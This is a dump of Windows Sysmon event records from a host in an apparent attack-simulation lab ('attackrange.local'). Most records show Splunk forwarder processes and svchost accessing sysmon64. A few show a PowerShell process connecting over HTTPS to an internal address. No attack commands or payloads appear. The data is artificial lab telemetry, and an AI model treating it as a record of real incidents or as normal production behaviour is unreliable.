18:10:43.532{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.532{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.532{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E23-613A-3990-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.517{B81B27B7-4E23-613A-3990-03000000C801}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:43.197{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=377CFE206C0EF1A4C82DD4B070FCBEF2,SHA256=25084D9D57DA5E5FA1E944B52099905B605A268242D5C63990FA0413983DB111,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.900{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E24-613A-3B90-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.900{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.900{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.900{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.900{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.900{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E24-613A-3B90-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.900{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E24-613A-3B90-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.894{B81B27B7-4E24-613A-3B90-03000000C801}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.531{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37AEE81A829E536FC80ECE7A6C115EC5,SHA256=458156613AA1858A5FBAF3131B3AB26255B1DD64E1E1DACA3BE57FE53423B1FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.531{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D203BCD4BBD2E3BFC7275B330AFEC4D,SHA256=5DB2536D6639B320B8FD7D082A0ED86056C667D533D60E611A9E5EFE1DEBFEEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.378{B81B27B7-4E24-613A-3A90-03000000C801}7564560C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC36E13EC9CCDB1251C5ABC81A69F1A,SHA256=1B1A545B90ACB7AEAFB47FFC7F23E2B34CA76BD779751FF118D637707F2A79F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E24-613A-3A90-03000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E24-613A-3A90-03000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.231{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E24-613A-3A90-03000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:44.217{B81B27B7-4E24-613A-3A90-03000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:45.962{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B3F189F500BD1D07D974266D198A70C2,SHA256=74F2341A79A060695A50170720C526E24E0B399A3BCA8D5A42B4F01416C42781,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:45.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37AEE81A829E536FC80ECE7A6C115EC5,SHA256=458156613AA1858A5FBAF3131B3AB26255B1DD64E1E1DACA3BE57FE53423B1FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:45.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0A633E129AA48C8F45E0F66FA97CA23,SHA256=9C676C8838C2B8EB872CB1A6ED79D2D814B9B0DBCCBFFF7185BABB297112EAAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:10.965{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56606-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:10.181{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56605-false10.0.1.12-8000- 23542300x800000000000000035084453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:46.262{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FD06A7224B4CEF903920B0AD179766A,SHA256=4E0398140B9C4A02121DAF0745243F4FB8227AA9FE467ABDA2CAB7D5D2416648,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:47.314{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80D1F84B07560EF1B538B242871B12B9,SHA256=EA042C07B0B030EE4DB3F8118840A27A39348D97A2CED8516941098620016C12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:48.329{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61AC912EEBF779741B894D3D49A7AD14,SHA256=046A5FE4E8D6C6F5F63DF025FB4ADA63C912D57F2EBF82A4CFE7714C266591C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:49.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FE095ECAFE2E07617FF0E3D8C9B03B,SHA256=12B9F7FAF51FEF5605E3BC39830AEFC529B019EF7A14AF9D1EF91C33B00E32FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 